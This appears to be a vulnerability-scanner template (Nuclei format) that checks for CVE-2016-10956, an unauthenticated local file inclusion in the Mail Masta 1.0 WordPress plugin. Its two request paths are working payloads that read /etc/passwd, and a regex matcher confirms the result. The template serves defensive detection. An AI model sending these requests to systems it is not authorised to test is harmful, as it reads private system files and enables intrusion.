id: CVE-2016-10956 info: name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 tags: cve,cve2016,wordpress,wp-plugin,lfi requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" part: body - type: status status: - 200